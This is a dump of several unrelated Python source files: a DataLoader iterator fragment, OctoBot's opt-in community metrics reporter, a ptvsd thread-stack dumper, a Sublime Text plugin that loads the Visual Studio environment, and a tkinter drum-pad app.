        core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
        _set_SIGCHLD_handler()
    def _clear_and_remove_data_queue(self):
        """Drain the workers' result queue, then close it.

        Draining first prevents a worker's queue feeder thread from
        blocking process shutdown on unconsumed items.
        """
        if self._data_queue is not None:
            while True:
                try:
                    self._data_queue.get_nowait()
                except:
                    # queue empty (or already unusable): stop draining
                    self._data_queue.cancel_join_thread()
                    self._data_queue.close()
                    break
    def _init_thread(self):
        """Create the blocking queue / py_reader pair and start the reader
        thread that moves worker results into the blocking queue."""
        # metadata create_py_reader needs to validate fed data against
        self._var_names = [v.name for v in self._feed_list]
        self._shapes = [v.shape for v in self._feed_list]
        self._dtypes = [v.dtype for v in self._feed_list]
        self._need_check_feed = [
            v.desc.need_check_feed() for v in self._feed_list
        ]
        # if only 1 place, do not need to keep order
        self._blocking_queue = core.init_lod_tensor_blocking_queue(
            core.Variable(), self._outstanding_capacity, len(self._places) > 1)
        self._reader = core.create_py_reader(
            self._blocking_queue, self._var_names, self._shapes, self._dtypes,
            self._need_check_feed, self._places, self._use_buffer_reader, True,
            self._pin_memory)

        self._thread_done_event = threading.Event()
        # daemon thread so an abandoned iterator cannot block interpreter exit
        self._thread = threading.Thread(target=self._thread_loop)
        self._thread.daemon = True
        self._thread.start()
    def _shutdown_worker(self, worker_id):
        """Send the None poison pill to one worker and mark it stopped."""
        if self._worker_status[worker_id]:
            self._indices_queues[worker_id].put(None)
            self._worker_status[worker_id] = False
    def _try_shutdown_all(self):
        """Idempotent full teardown: reader thread, result queue, workers,
        indices queues, then unregister the worker pids."""
        if not self._shutdown:
            try:
                self._exit_thread_expectedly()
                self._clear_and_remove_data_queue()

                # set _workers_done_event should be set before put None
                # to indices_queue, workers wll exit on reading None from
                # indices_queue
                self._workers_done_event.set()
                for i in range(self._num_workers):
                    self._shutdown_worker(i)

                for w in self._workers:
                    w.join()
                for q in self._indices_queues:
                    q.cancel_join_thread()
                    q.close()
            finally:
                core._erase_process_pids(id(self))
                self._shutdown = True
    def _exit_thread_expectedly(self):
        """Normal reader-thread exit: signal done and close the queue."""
        self._thread_done_event.set()
        self._blocking_queue.close()
    def _exit_thread_unexpectedly(self):
        """Error path: signal done and kill the queue so readers unblock."""
        self._thread_done_event.set()
        self._blocking_queue.kill()
        logging.error("DataLoader reader thread raised an exception!")
    def _thread_loop(self):
        """Reader-thread body: pull ordered batches via _get_data and push
        them into the blocking queue until done or drained."""
        while not self._thread_done_event.is_set():
            batch = self._get_data()
            if not self._thread_done_event.is_set():
                if batch is None:
                    # all workers drained: normal end of epoch
                    self._exit_thread_expectedly()
                elif isinstance(batch, Exception):
                    # a worker reported a failure
                    # NOTE(review): the exception is not re-raised here;
                    # consumers only see the killed queue — confirm intended
                    self._exit_thread_unexpectedly()
                else:
                    try:
                        # pack as LoDTensorArray
                        array = core.LoDTensorArray()
                        if self._use_shared_memory:
                            for tensor in batch:
                                array.append(tensor)
                        else:
                            # LoDTensor not in shared memory is not
                            # serializable, cannot be create in workers
                            for slot in batch:
                                if not isinstance(slot, core.LoDTensor):
                                    tmp = core.LoDTensor()
                                    tmp.set(slot, core.CPUPlace())
                                    slot = tmp
                                array.append(slot)

                        if not self._blocking_queue.push(array):
                            self._blocking_queue.close()
                    except:
                        self._exit_thread_unexpectedly()
                        six.reraise(*sys.exc_info())
                    finally:
                        # advance even on failure so ordering bookkeeping
                        # stays consistent with _get_data
                        self._rcvd_idx += 1
    def _get_data(self):
        """Fetch the next in-order batch from the workers' result queue.

        Returns the batch data, ``None`` when data is drained, or buffers
        out-of-order batches in ``_task_infos`` until their turn comes.
        Handles worker crashes (raises RuntimeError), queue timeouts
        (retries) and per-worker StopIteration for iterable datasets.
        """
        while not self._thread_done_event.is_set():
            # For IterableDataset, batch indices is generated infinitely
            # for each worker to raise StopIteration, but a StopIteration
            # raising process will discard a batch indices which is count
            # in _send_idx but will not increase _rcvd_idx, so we check
            # whether the worker is still alive here to skip the discarded
            # batch indices and increase _rcvd_idx
            if self._dataset_kind == _DatasetKind.ITER:
                while self._rcvd_idx < self._send_idx:
                    info = self._task_infos[self._rcvd_idx]
                    if len(info) == 2 or self._worker_status[info[0]]:
                        break
                    del self._task_infos[self._rcvd_idx]
                    self._rcvd_idx += 1
                    self._batches_outstanding -= 1
                else:
                    # NOTE: _rcvd_idx and _send_idx only record batches among
                    #       workers, if batches among workers drained, there
                    #       may also be data in blocking queue
                    if self._batches_outstanding < len(self._places):
                        return None
                    continue
            # The batch for _rcvd_idx already arrived out of order earlier:
            # hand it out without touching the queue.
            if self._rcvd_idx in self._task_infos and \
                    len(self._task_infos[self._rcvd_idx]) == 2:
                return self._task_infos.pop(self._rcvd_idx)[1]
            try:
                # [ avoid hang ]: main process may blocking at _reader.read_next when
                # KeyboardInterrupt, we do following tradeoff:
                # 1. get data with timeout, MP_INDICES_CHECK_INTERVAL(5s) as timeout
                #    default, if KeyboardInterrupt blocking, failed workers will be
                #    checked and raise RuntimeError to quit DataLoader in timeout
                #    exception handling.
                # 2. if get data timeout and check workers all alive, continue to
                #    get data again
                data = self._data_queue.get(timeout=self._timeout)
            except Exception as e:
                # check if thread done event set when waiting data
                if self._thread_done_event.is_set():
                    continue
                # check failed workers
                failed_workers = []
                for i, w in enumerate(self._workers):
                    if self._worker_status[i] and not w.is_alive():
                        failed_workers.append(w)
                        self._shutdown_worker(i)
                if len(failed_workers) > 0:
                    self._exit_thread_unexpectedly()
                    pids = ', '.join(str(w.pid) for w in failed_workers)
                    raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
                                       "pids: {}".format(len(failed_workers), pids))
                # get(timeout) will call _poll(timeout) and may raise IOError
                if isinstance(e, queue.Empty) or isinstance(e, IOError):
                    # continue on timeout to keep getting data from queue
                    continue
                self._exit_thread_unexpectedly()
                logging.error("DataLoader reader thread failed({}) to read data from " \
                              "workers' result queue.".format(e))
                six.reraise(*sys.exc_info())
            else:
                if self._dataset_kind == _DatasetKind.ITER and isinstance(
                        data, _IterableDatasetStopIteration):
                    # if a worker get StopIteraion, we shutdown this worker,
                    # note that this batch indices to trigger StopIteration
                    # is discard, outstanding batch number should be decrease
                    # and another indices should be put for other workers
                    # may still working.
                    self._shutdown_worker(data.worker_id)
                    self._batches_outstanding -= 1
                    self._try_put_indices()
                    continue
                idx, batch = data
                if idx == self._rcvd_idx:
                    # In-order batch: consume its task info and return it.
                    del self._task_infos[idx]
                    return batch
                else:
                    # Out-of-order batch: stash it until _rcvd_idx catches up.
                    self._task_infos[idx] += (batch, )
                    continue
    def _try_put_indices(self):
        """Fetch the next batch indices from the sampler and dispatch them to
        an alive worker (round-robin).  No-op when the sampler is exhausted
        or every worker has already exited."""
        assert self._batches_outstanding <= self._outstanding_capacity, \
            "too many indices have been put to queue"
        # In multi-process mode for IterableDataset, _try_put_indices will
        # be called both in main process(for our implement has blocking queue,
        # and blocking queue read is in main process) and thread, which may
        # cause error following error
        #   1. "ValueError: generator already executing" in next(self._sampler_iter)
        #   2. re-enter in increase _send_idx
        # add a lock for threading save, for _try_put_indices is only a slight
        # function which is not in data reading pipeline, this lock almost no
        # influence on performance
        with self._thread_lock:
            try:
                indices = next(self._sampler_iter)
            except StopIteration:
                return
            # Pick the next alive worker in cycle order; bail out when every
            # worker has been shut down.
            for i in range(self._num_workers):
                worker_idx = next(self._workers_idx_cycle)
                if self._worker_status[worker_idx]:
                    break
            else:
                return
            self._indices_queues[worker_idx].put((self._send_idx, indices))
            # Record which worker owns this batch id; the batch data is added
            # to this tuple when it arrives out of order.
            self._task_infos[self._send_idx] = (worker_idx, )
            self._batches_outstanding += 1
            self._send_idx += 1
    def __del__(self):
        # Best-effort cleanup when the loader is garbage collected
        # (_try_shutdown_all is idempotent, so this is safe even after an
        # explicit shutdown).
        self._try_shutdown_all()
    def __next__(self):
        """Return the next batch from the reader, shutting the whole pipeline
        down and re-raising StopIteration once data is drained."""
        try:
            # _batches_outstanding here record the total batch data number
            # in 'from after _try_put_indices to beforeoutput data', this
            # value should be _outstanding_capacity if data is not drained,
            # if _batches_outstanding is less than _places number, there are
            # no enough data to generate next output, close blocking_queue and
            # set _thread_done_event here, py_reader will raise StopIteration,
            # end workers and indices_queues in StopIteration handling
            if self._batches_outstanding < len(self._places):
                self._thread_done_event.set()
                self._blocking_queue.close()
            if in_dygraph_mode():
                data = self._reader.read_next_var_list()
            else:
                if self._return_list:
                    data = self._reader.read_next_list()
                    # static graph organized data on multi-device with list, if
                    # place number is 1, there is only 1 device, extra the data
                    # from list for devices to be compatible with dygraph mode
                    if len(self._places) == 1:
                        data = data[0]
                else:
                    data = self._reader.read_next()
            self._on_output_batch()
            return data
        except StopIteration:
            self._reader.reset()
            self._try_shutdown_all()
            six.reraise(*sys.exc_info())
    # python2 compatibility
    def next(self):
        # Delegate to the Python 3 iterator protocol method.
        return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
community_manager.py | # This file is part of OctoBot (https://github.com/Drakkar-Software/OctoBot)
# Copyright (c) 2021 Drakkar-Software, All rights reserved.
#
# OctoBot is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either
# version 3.0 of the License, or (at your option) any later version.
#
# OctoBot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with OctoBot. If not, see <https://www.gnu.org/licenses/>.
import time
import asyncio
import json
import requests
import threading
import octobot_commons.logging as logging
import octobot_commons.configuration as configuration
import octobot_commons.os_util as os_util
import octobot_commons.symbol_util as symbol_util
import octobot_commons.constants as common_constants
import octobot_evaluators.api as evaluator_api
import octobot_evaluators.enums as evaluator_enums
import octobot_services.constants as service_constants
import octobot_trading.api as trading_api
import octobot.community.community_fields as community_fields
import octobot.constants as constants
class CommunityManager:
    """Reports anonymous usage metrics about this OctoBot to the community
    metrics server: registers the session, then sends periodic keep-alive
    updates (uptime, profitability, traded volumes).

    Network failures are only logged at debug level so metrics can never
    break the bot itself.
    """
    # HTTP headers used for every request to the metrics server.
    _headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
    def __init__(self, octobot_api):
        self.octobot_api = octobot_api
        self.edited_config: configuration.Configuration = octobot_api.get_edited_config(dict_only=False)
        self.enabled = self.edited_config.get_metrics_enabled()
        self.reference_market = trading_api.get_reference_market(self.edited_config.config)
        self.logger = logging.get_logger(self.__class__.__name__)
        self.current_config = None
        self.keep_running = True
        self.session = octobot_api.get_aiohttp_session()
        try:
            self.bot_id = self.edited_config.get_metrics_id()
        except KeyError:
            # No id in config yet: one will be generated on first registration.
            self.bot_id = None
        # these attributes will be set at the last moment to ensure relevance and let time for everything to startup
        self.has_real_trader = None
        self.has_simulator = None
        self.exchange_managers = None
    def _init_community_config(self):
        # Resolve trader/simulator state and exchange managers right before
        # registering, once the bot has fully started up.
        self.has_real_trader = trading_api.is_trader_enabled_in_config(self.edited_config.config)
        self.has_simulator = trading_api.is_trader_simulator_enabled_in_config(self.edited_config.config)
        self.exchange_managers = trading_api.get_exchange_managers_from_exchange_ids(
            self.octobot_api.get_exchange_manager_ids())
    async def start_community_task(self):
        """Register this session then loop sending keep-alive updates until
        stop_task() is called.  No-op when metrics are disabled."""
        if self.enabled:
            try:
                # first ensure this session is not just a configuration test: register after a timer
                await asyncio.sleep(common_constants.TIMER_BEFORE_METRICS_REGISTRATION_SECONDS)
                self._init_community_config()
                await self.register_session()
                while self.keep_running:
                    # send a keepalive at periodic intervals
                    await asyncio.sleep(common_constants.TIMER_BETWEEN_METRICS_UPTIME_UPDATE)
                    try:
                        await self._update_session()
                    except Exception as e:
                        self.logger.debug(f"Exception when handling community data : {e}")
            except asyncio.CancelledError:
                pass
            except Exception as e:
                self.logger.debug(f"Exception when handling community registration: {e}")
    async def stop_task(self):
        """Stop the keep-alive loop and close the HTTP session."""
        self.keep_running = False
        await self.session.close()
    @staticmethod
    def should_register_bot(config: configuration.Configuration):
        # NOTE(review): returns True when a metrics id is ALREADY present in
        # config (get_metrics_id raises KeyError otherwise) — confirm the
        # intended semantics against the method name at call sites.
        try:
            config.get_metrics_id()
            return True
        except KeyError:
            return False
    @staticmethod
    def background_get_id_and_register_bot(octobot_api):
        """Generate a bot id and register it on a background thread, using
        the blocking requests-based flow (for use outside the event loop)."""
        community_manager = CommunityManager(octobot_api)
        threading.Thread(target=community_manager._blocking_get_id_and_register).start()
    def _blocking_get_id_and_register(self):
        # Synchronous (requests) equivalent of _init_bot_id + register_session.
        try:
            resp = requests.get(f"{common_constants.METRICS_URL}{common_constants.METRICS_ROUTE_GEN_BOT_ID}",
                                headers=self._headers)
            text = resp.text
            if resp.status_code != 200:
                self.logger.debug(f"Impossible to get bot id: status code: {resp.status_code}, text: {text}")
            else:
                self.bot_id = json.loads(text)
                self._save_bot_id()
                community = self._get_bot_community()
                requests.post(f"{common_constants.METRICS_URL}{common_constants.METRICS_ROUTE_REGISTER}",
                              json=community, headers=self._headers)
        except Exception as e:
            self.logger.debug(f"Error when handling community: {e}")
    async def register_session(self, retry_on_error=True):
        """Build the full community payload and post it to the register route."""
        self.current_config = await self._get_current_community_config()
        await self._post_community_data(common_constants.METRICS_ROUTE_REGISTER, self.current_config, retry_on_error)
    async def _update_session(self, retry_on_error=True):
        # Refresh the volatile session fields before posting the keep-alive.
        self.current_config[community_fields.CommunityFields.CURRENT_SESSION.value][
            community_fields.CommunityFields.UP_TIME.value] = int(time.time() - self.octobot_api.get_start_time())
        self.current_config[community_fields.CommunityFields.CURRENT_SESSION.value][
            community_fields.CommunityFields.PROFITABILITY.value] = self._get_profitability()
        self.current_config[community_fields.CommunityFields.CURRENT_SESSION.value][
            community_fields.CommunityFields.TRADED_VOLUMES.value] = self._get_traded_volumes()
        await self._post_community_data(common_constants.METRICS_ROUTE_UPTIME, self.current_config, retry_on_error)
    async def _get_current_community_config(self):
        # Lazily fetch a bot id first; returns None when no id could be obtained.
        if not self.bot_id:
            await self._init_bot_id()
        if self.bot_id:
            return self._get_bot_community()
    def _get_bot_community(self):
        """Build the full metrics payload describing this bot session."""
        return {
            community_fields.CommunityFields.ID.value: self.bot_id,
            community_fields.CommunityFields.CURRENT_SESSION.value: {
                community_fields.CommunityFields.STARTED_AT.value: int(self.octobot_api.get_start_time()),
                community_fields.CommunityFields.UP_TIME.value: int(time.time() - self.octobot_api.get_start_time()),
                community_fields.CommunityFields.VERSION.value: constants.LONG_VERSION,
                community_fields.CommunityFields.SIMULATOR.value: self.has_simulator,
                community_fields.CommunityFields.TRADER.value: self.has_real_trader,
                community_fields.CommunityFields.EVAL_CONFIG.value: self._get_eval_config(),
                community_fields.CommunityFields.PAIRS.value: self._get_traded_pairs(),
                community_fields.CommunityFields.EXCHANGES.value: list(trading_api.get_exchange_names()),
                community_fields.CommunityFields.NOTIFICATIONS.value: self._get_notification_types(),
                community_fields.CommunityFields.TYPE.value: os_util.get_octobot_type(),
                community_fields.CommunityFields.PLATFORM.value: os_util.get_current_platform(),
                community_fields.CommunityFields.REFERENCE_MARKET.value: self.reference_market,
                community_fields.CommunityFields.PORTFOLIO_VALUE.value: self._get_real_portfolio_value(),
                community_fields.CommunityFields.PROFITABILITY.value: self._get_profitability(),
                community_fields.CommunityFields.TRADED_VOLUMES.value: self._get_traded_volumes(),
                community_fields.CommunityFields.SUPPORTS.value: self._get_supports()
            }
        }
    def _get_profitability(self):
        # Aggregate profitability (percent) across exchanges, weighted by the
        # summed current portfolio values; 0 when no value is available.
        total_origin_values = 0
        total_profitability = 0
        for exchange_manager in self.exchange_managers:
            profitability, _, _, _, _ = trading_api.get_profitability_stats(exchange_manager)
            total_profitability += float(profitability)
            total_origin_values += float(trading_api.get_current_portfolio_value(exchange_manager))
        return total_profitability * 100 / total_origin_values if total_origin_values > 0 else 0
    def _get_traded_volumes(self):
        # Sum real-trade costs per quote currency since bot start; empty when
        # only the simulator is running.
        volume_by_currency = {}
        if self.has_real_trader:
            trades = []
            for exchange_manager in self.exchange_managers:
                trades += trading_api.get_trade_history(exchange_manager, since=self.octobot_api.get_start_time())
            for trade in trades:
                # cost is in quote currency for a traded pair
                currency = symbol_util.split_symbol(trade.symbol)[-1]
                if currency in volume_by_currency:
                    volume_by_currency[currency] += float(trade.total_cost)
                else:
                    volume_by_currency[currency] = float(trade.total_cost)
        return volume_by_currency
    def _get_supports(self):
        # Exchanges that sponsor OctoBot and are traded with a real, valid
        # account, plus the user's community support roles and donations.
        supporting_exchanges = []
        for exchange_manager in self.exchange_managers:
            exchange_name = trading_api.get_exchange_name(exchange_manager)
            if self.has_real_trader \
                    and trading_api.is_sponsoring(exchange_name) \
                    and trading_api.is_valid_account(exchange_manager):
                supporting_exchanges.append(exchange_name)
        supports = self.octobot_api.get_community_auth().supports
        return {
            community_fields.CommunityFields.EXCHANGES.value: supporting_exchanges,
            community_fields.CommunityFields.ROLES.value: [supports.support_role],
            community_fields.CommunityFields.DONATIONS.value: [str(donation) for donation in supports.donations]
        }
    def _get_real_portfolio_value(self):
        # Total current portfolio value across exchanges for real traders;
        # 0 in simulator-only mode.
        if self.has_real_trader:
            total_value = 0
            for exchange_manager in self.exchange_managers:
                current_value = trading_api.get_current_portfolio_value(exchange_manager)
                # current_value might be 0 if no trades have been made / canceled => use origin value
                if current_value == 0:
                    current_value = trading_api.get_origin_portfolio_value(exchange_manager)
                total_value += current_value
            return float(total_value)
        else:
            return 0
    def _get_traded_pairs(self):
        # Union of the trading pairs enabled on every exchange.
        pairs = set()
        for exchange_manager in self.exchange_managers:
            pairs = pairs.union(trading_api.get_trading_pairs(exchange_manager))
        return list(pairs)
    def _get_notification_types(self):
        # Configured notification types, or [] when notifications are not set up.
        has_notifications = service_constants.CONFIG_CATEGORY_NOTIFICATION in self.edited_config.config \
                            and service_constants.CONFIG_NOTIFICATION_TYPE in self.edited_config.config[
                                service_constants.CONFIG_CATEGORY_NOTIFICATION]
        return self.edited_config.config[service_constants.CONFIG_CATEGORY_NOTIFICATION][
            service_constants.CONFIG_NOTIFICATION_TYPE] if has_notifications else []
    def _get_eval_config(self):
        """Return the names of the activated trading mode, strategies and
        evaluators (TA, social, real-time)."""
        tentacle_setup_config = self.octobot_api.get_tentacles_setup_config()
        # trading mode
        config_eval = []
        if (trading_mode := self.octobot_api.get_trading_mode()) is not None:
            config_eval.append(trading_mode.get_name())
        # strategies
        for strategy in evaluator_api.get_evaluator_classes_from_type(
                evaluator_enums.EvaluatorMatrixTypes.STRATEGIES.value,
                tentacle_setup_config):
            config_eval.append(strategy.get_name())
        # evaluators
        evaluators = evaluator_api.get_evaluator_classes_from_type(evaluator_enums.EvaluatorMatrixTypes.TA.value,
                                                                   tentacle_setup_config)
        evaluators += evaluator_api.get_evaluator_classes_from_type(evaluator_enums.EvaluatorMatrixTypes.SOCIAL.value,
                                                                    tentacle_setup_config)
        evaluators += evaluator_api.get_evaluator_classes_from_type(
            evaluator_enums.EvaluatorMatrixTypes.REAL_TIME.value,
            tentacle_setup_config)
        for evaluator in evaluators:
            config_eval.append(evaluator.get_name())
        return config_eval
    async def _init_bot_id(self):
        # Ask the metrics server to generate a new bot id and persist it.
        try:
            async with self.session.get(f"{common_constants.METRICS_URL}{common_constants.METRICS_ROUTE_GEN_BOT_ID}",
                                        headers=self._headers) as resp:
                text = await resp.text()
                if resp.status != 200:
                    self.logger.debug(f"Impossible to get bot id: status code: {resp.status}, text: {text}")
                else:
                    self.bot_id = json.loads(text)
                    self._save_bot_id()
        except Exception as e:
            self.logger.debug(f"Error when handling community data : {e}")
    def _save_bot_id(self):
        # Persist the bot id in the metrics section of the edited config,
        # creating that section if missing.
        if common_constants.CONFIG_METRICS not in self.edited_config.config \
                or not self.edited_config.config[common_constants.CONFIG_METRICS]:
            self.edited_config.config[common_constants.CONFIG_METRICS] = {common_constants.CONFIG_ENABLED_OPTION: True}
        self.edited_config.config[common_constants.CONFIG_METRICS][common_constants.CONFIG_METRICS_BOT_ID] = self.bot_id
        self.edited_config.save()
    async def _post_community_data(self, route, bot, retry_on_error):
        # POST the payload; failures are only logged so metrics can never
        # break the bot.
        try:
            async with self.session.post(f"{common_constants.METRICS_URL}{route}", json=bot,
                                         headers=self._headers) as resp:
                await self._handle_post_error(resp, retry_on_error)
        except Exception as e:
            self.logger.debug(f"Error when handling community data : {e}")
    async def _handle_post_error(self, resp, retry_on_error):
        if resp.status != 200:
            if resp.status == 404:
                # did not found bot with id in config: generate new id and register new bot
                if retry_on_error:
                    await self._init_bot_id()
                    await self.register_session(retry_on_error=False)
            else:
                self.logger.debug(f"Impossible to send community data : "
                                  f"status code: {resp.status}, "
                                  f"text: {await resp.text()}")
|
stacks.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
"""Provides facilities to dump all stacks of all threads in the process.
"""
import os
import sys
import time
import threading
import traceback
from ptvsd.common import log
def dump():
    """Dump stacks of all threads in this process, except for the current thread.

    For every frame returned by sys._current_frames(), the matching
    threading.Thread is looked up so the log line can carry the thread's
    name and daemon flag; "<unknown>" is used when no match is found
    (e.g. a thread not created via the threading module).
    """
    tid = threading.current_thread().ident
    pid = os.getpid()
    log.info("Dumping stacks for process {0}...", pid)
    for t_ident, frame in sys._current_frames().items():
        if t_ident == tid:
            continue
        # Find the Thread object for THIS frame's ident.  (Bug fix: this
        # previously compared against the current thread's ident, which
        # mislabelled every dumped stack with the current thread's name.)
        for t in threading.enumerate():
            if t.ident == t_ident:
                t_name = t.name
                t_daemon = t.daemon
                break
        else:
            t_name = t_daemon = "<unknown>"
        stack = "".join(traceback.format_stack(frame))
        log.info(
            "Stack of thread {0} (tid={1}, pid={2}, daemon={3}):\n\n{4}",
            t_name,
            t_ident,
            pid,
            t_daemon,
            stack,
        )
    log.info("Finished dumping stacks for process {0}.", pid)
def dump_after(secs):
    """Invokes dump() on a background thread after waiting for the specified time.
    """
    def _delayed_dump():
        time.sleep(secs)
        try:
            dump()
        except:
            # Never let a dump failure take the process down.
            log.exception()
    worker = threading.Thread(target=_delayed_dump)
    worker.daemon = True
    worker.start()
|
set_vc_vars.py | import sublime
import sublime_plugin
from threading import Thread
from subprocess import Popen, PIPE
from os import environ
# Related reading;
# https://stackoverflow.com/questions/39881091/how-to-run-sublimetext-with-visual-studio-environment-enabled/
# For the unfamiliar, Visual Studio ships with a batch file which sets up the
# environment variables you need to be able to run visual studio tools from a
# command prompt.
#
# This plugin was written in response to someone that wanted to know how you
# could run Sublime and have it have the visual studio environment already set
# up.
#
# This plugin will use a subprocess to execute the batch file in the background
# and then issue the 'set' command to get the command interpreter to output the
# state of the environment before it exits.
#
# This output is gathered and parsed to come up with a dictionary similar to
# the environ table that python uses. From here we can easily detect what new
# environment variables were added and the values of those that changed, and
# set them as appropriate.
#
# As written Sublime needs to be restarted in order to execute the batch file
# again. A more elegant solution would be to save the environment prior to
# modifying it so that it could be restored and a new environment applied.
# To use this, you need to specify a setting in your user preferences named
# 'vc_vars_cmd' which should contain a complete path to the batch file you want
# to execute. Optionally you can also specify 'vc_vars_arch', which will be
# passed as a command line argument to the batch file executed. Remember that
# the preferences are JSON, so you need to quote all path separators.
SENTINEL="SUBL_VC_VARS"
def _get_vc_env():
    """
    Run the batch file specified in the vc_vars_cmd setting (with an
    optional architecture type) and return back a dictionary of the
    environment that the batch file sets up.

    Returns None if the preference is missing or the batch file fails.
    """
    settings = sublime.load_settings("Preferences.sublime-settings")
    vars_cmd = settings.get("vc_vars_cmd")
    vars_arch = settings.get("vc_vars_arch", "amd64")
    if vars_cmd is None:
        print("set_vc_vars: Cannot set Visual Studio Environment")
        print("set_vc_vars: Add 'vc_vars_cmd' setting to settings and restart")
        return None
    try:
        # Run the batch, outputting a sentinel value so we can separate out
        # any error messages the batch might generate.
        shell_cmd = "\"{0}\" {1} && echo {2} && set".format(
            vars_cmd, vars_arch, SENTINEL)
        output = Popen(shell_cmd, stdout=PIPE, shell=True).stdout.read()
        lines = [line.strip() for line in output.decode("utf-8").splitlines()]
        env_lines = lines[lines.index(SENTINEL) + 1:]
    except:
        return None
    # Convert from var=value to dictionary key/value pairs. We upper case the
    # keys, since Python does that to the mapping it stores in environ.
    env = {}
    for env_var in env_lines:
        parts = env_var.split("=", maxsplit=1)
        # Bug fix: the command output can contain blank or malformed lines;
        # indexing parts[1] on those raised IndexError (outside the try
        # block above).  Skip anything that is not a KEY=value pair.
        if len(parts) != 2 or not parts[0]:
            continue
        env[parts[0].upper()] = parts[1]
    return env
def install_vc_env():
    """
    Try to collect the appropriate Visual Studio environment variables and
    set them into the current environment.
    """
    vc_env = _get_vc_env()
    if vc_env is None:
        print("set_vc_vars: Unable to fetch the Visual Studio Environment")
        return sublime.status_message("Error fetching VS Environment")
    # Merge the captured environment into ours: install variables that are
    # new and refresh existing ones whose value changed.
    for key, value in vc_env.items():
        if key not in environ or environ[key] != value:
            environ[key] = value
    # Set a sentinel variable so we know not to try setting up the path again.
    environ[SENTINEL] = "BOOTSTRAPPED"
    sublime.status_message("VS Environment enabled")
def plugin_loaded():
    """Entry point invoked by Sublime once the plugin is loaded."""
    if sublime.platform() != "windows":
        return sublime.status_message("VS is not supported on this platform")
    # To reload the environment if it changes, restart Sublime.
    if SENTINEL in environ:
        return sublime.status_message("VS Environment already enabled")
    # Run the slow batch-file execution off the UI thread.
    Thread(target=install_vc_env).start()
|
beatBoard.py | from tkinter import *
from playsound import playsound
from threading import Thread
class padSound:
    """A sound pad: wraps the path of an audio file and plays it on a
    background thread so the Tk event loop never blocks."""

    def __init__(self, soundLocation):
        # Path of the audio file this pad plays.
        self.soundLocation = soundLocation

    def given_sound(self):
        # playsound blocks until playback finishes, hence the thread below.
        playsound(self.soundLocation)

    def play_sound(self, event):
        """Tk event callback: fire-and-forget playback of this pad's sound."""
        Thread(target=self.given_sound).start()
# All the locations of the sounds
# NOTE(review): paths are relative to the process working directory, so the
# script must be launched from the folder containing Beat-Board — confirm.
kickLocation = './Beat-Board/Sounds/Kick.wav'
hiHatLocation = './Beat-Board/Sounds/hiHat.wav'
snareLocation = './Beat-Board/Sounds/snare.wav'
pad1Location = './Beat-Board/Sounds/Pad1.wav'
pad2Location = './Beat-Board/Sounds/Pad2.wav'
pad3Location = './Beat-Board/Sounds/Pad3.wav'
pad4Location = './Beat-Board/Sounds/Pad4.wav'
pad5Location = './Beat-Board/Sounds/Pad5.wav'
pad6Location = './Beat-Board/Sounds/Pad6.wav'
# Create drum objects
kickDrum = padSound(kickLocation)
hiHatDrum = padSound(hiHatLocation)
snareDrum = padSound(snareLocation)
# Create pad objects
pad1 = padSound(pad1Location)
pad2 = padSound(pad2Location)
pad3 = padSound(pad3Location)
pad4 = padSound(pad4Location)
pad5 = padSound(pad5Location)
pad6 = padSound(pad6Location)
def create_layout():
    """Build the 3x3 grid of drum/pad buttons inside main_window and wire
    both mouse clicks and keyboard shortcuts to the pad sounds.

    Keyboard shortcuts (bound on the frame, which takes focus):
    q/w/e -> kick/hi-hat/snare, a/s/d -> pads 1-3, z/x/c -> pads 4-6.
    """
    # Creates the Frame
    frame_a = Frame(master=main_window, width=500, height=500, bg="black")
    frame_a.grid(rowspan=3, columnspan=3)
    # The frame must own keyboard focus for the key bindings below to fire.
    frame_a.focus_set()
    # Creates the Buttons
    # ------------------------------------------------
    # Kick Button
    kickButton = Button(text="Kick", height=5, width=10)
    frame_a.bind('q', kickDrum.play_sound)
    kickButton.bind("<Button-1>", kickDrum.play_sound)
    # Hi-hat Button
    hihatButton = Button(text="Hi-Hat", height=5, width=10)
    frame_a.bind('w', hiHatDrum.play_sound)
    hihatButton.bind("<Button-1>", hiHatDrum.play_sound)
    # Snare Button
    snareButton = Button(text="Snare", height=5, width=10)
    frame_a.bind('e', snareDrum.play_sound)
    snareButton.bind("<Button-1>", snareDrum.play_sound)
    # -------------------------------------------------
    # Pad 1
    pad1Button = Button(text="Pad 1", height=5, width=10)
    frame_a.bind('a', pad1.play_sound)
    pad1Button.bind("<Button-1>", pad1.play_sound)
    # Pad 2
    pad2Button = Button(text="Pad 2", height=5, width=10)
    frame_a.bind('s', pad2.play_sound)
    pad2Button.bind("<Button-1>", pad2.play_sound)
    # Pad 3
    pad3Button = Button(text="Pad 3", height=5, width=10)
    frame_a.bind('d', pad3.play_sound)
    # Bug fix: this click binding previously played pad2's sound.
    pad3Button.bind("<Button-1>", pad3.play_sound)
    # -------------------------------------------------
    # Pad 4
    pad4Button = Button(text="Pad 4", height=5, width=10)
    frame_a.bind('z', pad4.play_sound)
    pad4Button.bind("<Button-1>", pad4.play_sound)
    # Pad 5
    pad5Button = Button(text="Pad 5", height=5, width=10)
    frame_a.bind('x', pad5.play_sound)
    pad5Button.bind("<Button-1>", pad5.play_sound)
    # Pad 6
    pad6Button = Button(text="Pad 6", height=5, width=10)
    frame_a.bind('c', pad6.play_sound)
    pad6Button.bind("<Button-1>", pad6.play_sound)
    # -------------------------------------------------
    # Display Buttons
    kickButton.grid(row=0)
    hihatButton.grid(row=0, column=1)
    snareButton.grid(row=0, column=2)
    pad1Button.grid(row=1)
    pad2Button.grid(row=1, column=1)
    pad3Button.grid(row=1, column=2)
    pad4Button.grid(row=2)
    pad5Button.grid(row=2, column=1)
    pad6Button.grid(row=2, column=2)
# Build the fixed-size main window, lay out the pads and enter the Tk
# event loop (blocks until the window is closed).
main_window = Tk()
main_window.resizable(False,False)
main_window.title('Beat Board')
create_layout()
main_window.mainloop()
|
competition_example.py | #!/usr/bin/env python3
import ffai
import socket
